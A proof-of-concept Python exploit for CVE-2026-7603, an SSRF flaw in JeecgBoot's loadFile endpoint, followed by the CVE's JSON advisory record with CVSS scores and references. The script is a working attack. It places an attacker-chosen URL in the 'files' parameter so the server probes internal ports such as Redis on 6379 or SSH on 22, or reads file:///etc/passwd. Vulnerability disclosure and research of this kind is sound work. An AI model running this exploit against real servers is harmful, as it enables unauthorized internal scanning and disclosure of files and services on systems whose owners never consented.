CVE-2026-7603

# Proof of Concept for CVE-2026-7603 # This script demonstrates the SSRF vulnerability by sending a malicious request to the LoadFile endpoint. import requests def exploit_ssrf(target_url, internal_url): """ Attempts to trigger the SSRF vulnerability in JeecgBoot. :param target_url: The base URL of the vulnerable JeecgBooot application (e.g., http://localhost:8080) :param internal_url: The URL to attack (e.g., http://127.0.0.1:22 or file:///etc/passwd) """ # The vulnerable endpoint path might vary, typically '/jeecg-boot/sys/common/loadFile' or similar based on version endpoint = "/jeecg-boot/sys/common/loadFile" # Construct the payload by manipulating the 'files' argument payload = { "files": internal_url } try: print(f"[*] Sending request to {target_url}{endpoint} with payload: {payload}") response = requests.get(target_url + endpoint, params=payload, timeout=10) if response.status_code == 200: print(f"[+] Request successful! Server responded. Check response content for signs of SSRF.") print(f"[+] Response Length: {len(response.text)}") # In a real SSRF, the response content might contain data from the internal_url # or the response time might indicate a connection to an internal port. else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://127.0.0.1:8080" # Example payload to read a local file (if file:// protocol is supported) # or scan an internal port malicious_payload = "http://127.0.0.1:6379" exploit_ssrf(target, malicious_payload)

{"cve": {"id": "CVE-2026-7603", "sourceIdentifier": "[email protected]", "published": "2026-05-02T05:16:01.570", "lastModified": "2026-05-05T20:16:40.080", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in JeecgBoot up to 3.9.1. Affected by this issue is the function checkPathTraversalBatch of the file FileDownloadUtils.jav of the component LoadFile Endpoint. This manipulation of the argument files causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The affected component should be upgraded. The vendor confirmed the issue and will provide a fix in the upcoming release."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/jeecgboot/JeecgBoot/", "source": "[email protected]"}, {"url": "https://github.com/jeecgboot/JeecgBoot/issues/9553", "source": "[email protected]"}, {"url": "https://github.com/jeecgboot/JeecgBoot/issues/9553#issuecomment-4251745014", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/805707", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360560", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360560/cti", "source": "[email protected]"}, {"url": "https://github.com/jeecgboot/JeecgBoot/issues/9553#issuecomment-4251745014", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}